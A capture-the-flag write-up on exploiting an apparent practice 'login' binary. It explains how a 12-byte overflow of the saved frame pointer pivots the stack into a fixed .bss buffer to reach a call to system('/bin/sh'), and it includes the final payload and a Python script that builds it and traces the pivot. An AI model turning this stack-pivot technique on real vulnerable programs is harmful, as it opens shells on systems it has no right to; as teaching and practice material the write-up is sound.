(Too lazy to review lessons before the exam...) Loading the binary in IDA, we find:
_BOOL4 __cdecl auth(int a1)
{
  char v2; // [sp+14h] [bp-14h]@1
  char *s2; // [sp+1Ch] [bp-Ch]@1
  int v4; // [sp+20h] [bp-8h]@1

  memcpy(&v4, &input, a1); // a1 is at most 12: bytes 0-3 fill v4, 4-7 land at bp-4h, 8-11 overwrite the saved EBP at bp+0h
  s2 = (char *)calc_md5(&v2, 12);
  printf("hash : %s\n", (char)s2);
  return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}
Note that int v4 is at bp-8h. Any copy of more than 8 bytes starting at &v4 runs past the word at bp-4h and into the saved EBP at bp+0h; a 12-byte copy ends exactly at the end of the saved frame pointer, one word short of the return address.
str_len = Base64Decode(&s_input, &buf);
if ( str_len > 12 )
{
  puts("Wrong Length");
}
else
{
  memcpy(&input, buf, str_len); // the same decoded bytes also sit in .bss at input
  if ( auth(str_len) == 1 )
    correct();
}
But in main, the decoded length is only rejected when it exceeds 12, so auth's memcpy may write a full 12 bytes from bp-8h upward.
To control EIP we cannot reach the return address, but we can overwrite auth's saved EBP and move the stack instead. auth's own leave; ret pops our value into EBP and returns to main normally. When main then runs its epilogue, mov esp,ebp; pop ebp; ret, ESP is set to the address we chose, one word is popped into EBP, and ret jumps to the next word at [esp]. In other words, the second dword of our fake stack becomes the new EIP.
Jumping here gives us a shell, since the binary already contains system and a "/bin/sh" string:
.text:08049284 mov dword ptr [esp], offset aBinSh ; "/bin/sh"
.text:0804928B call system
And since input lives in the .bss section at a fixed address (the program has no PIE), we can simply point the fake stack at input itself: the same 12 bytes that overflow auth's frame are also sitting in .bss, so the payload doubles as the fake stack that main's epilogue consumes.
.bss:0811EB40 input
The final exp ("ABCD" fills v4 and is what main's pop ebp loads, 0x08049284 at input+4 is where main's ret lands, and 0x0811EB40 overwrites auth's saved EBP):
>>> import base64, struct
>>> base64.b64encode(b"ABCD" + struct.pack("<II", 0x08049284, 0x0811EB40)).decode()
'QUJDRISSBAhA6xEI'
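As an added illustration (not part of the original writeup), the script below builds the same 12-byte payload with struct and base64 and then traces both leave; ret epilogues over a tiny word-addressed memory model, so you can see exactly where EBP, ESP and EIP end up after the pivot. The stack values auth_ebp, main_ebp and main_ret are made-up placeholders for the live stack; only the .bss address of input and the system gadget address come from the IDA listing above.

```python
import base64
import struct

# Addresses taken from the IDA listing in the writeup (no PIE, so they are fixed).
INPUT_ADDR = 0x0811EB40    # .bss: input
SYSTEM_BINSH = 0x08049284  # mov dword ptr [esp], offset aBinSh ; call system
MAX_LEN = 12               # main rejects anything longer than this


def build_payload(target=SYSTEM_BINSH, fake_stack=INPUT_ADDR):
    """The 12 raw bytes that memcpy(&v4, &input, 12) writes from ebp-8 upward.

    [0:4]  -> v4 (ebp-8): filler; main's 'pop ebp' later loads it from input+0
    [4:8]  -> ebp-4: the copy in .bss (input+4) is what main's 'ret' jumps to
    [8:12] -> saved EBP (ebp+0): becomes main's EBP once auth returns
    """
    payload = b"ABCD" + struct.pack("<II", target, fake_stack)
    assert len(payload) == MAX_LEN
    return payload


def encode_payload(payload):
    """Base64 form fed to the program (what main's Base64Decode undoes)."""
    return base64.b64encode(payload).decode()


def simulate(payload, auth_ebp=0xBFFFF000, main_ebp=0xBFFFF030, main_ret=0x08049300):
    """Trace auth's and main's 'leave; ret' over a flat 32-bit word memory.

    auth_ebp, main_ebp and main_ret are placeholders (assumed values, not from
    the binary); only INPUT_ADDR and SYSTEM_BINSH are real.
    Returns (eip, esp) right after main's 'ret'.
    """
    mem = {}

    def w32(addr, val):
        mem[addr] = val & 0xFFFFFFFF

    def r32(addr):
        return mem[addr]

    def store(base, data):
        for off in range(0, len(data), 4):
            w32(base + off, struct.unpack("<I", data[off:off + 4])[0])

    # auth's prologue: caller's EBP saved at ebp+0, return address at ebp+4
    w32(auth_ebp, main_ebp)
    w32(auth_ebp + 4, main_ret)
    # main: memcpy(&input, buf, str_len) -> the payload lives in .bss
    store(INPUT_ADDR, payload)
    # auth: memcpy(&v4, &input, 12) with v4 at ebp-8 -> clobbers the saved EBP
    store(auth_ebp - 8, payload)

    def leave_ret(ebp):
        esp = ebp                      # mov esp, ebp
        new_ebp = r32(esp); esp += 4   # pop ebp
        eip = r32(esp); esp += 4       # ret
        return new_ebp, eip, esp

    # auth returns to main normally, but EBP now holds our fake stack address
    ebp, eip, _ = leave_ret(auth_ebp)
    assert eip == main_ret
    # main's epilogue moves ESP into .bss and pops EIP from input+4
    _, eip, esp = leave_ret(ebp)
    return eip, esp


if __name__ == "__main__":
    p = build_payload()
    print("base64 :", encode_payload(p))
    eip, esp = simulate(p)
    print("EIP after main's ret : 0x%08x" % eip)
    print("ESP after main's ret : 0x%08x (input+8, writable .bss)" % esp)
```

Two details the trace makes visible: the hash comparison in auth never has to pass, because a 0 return only skips correct() and main still reaches its own epilogue, which is where the pivot happens; and after main's ret ESP points at input+8, which is still inside writable .bss, so the gadget's mov [esp], offset aBinSh stores harmlessly into our own buffer and the following call system finds that pointer as its argument.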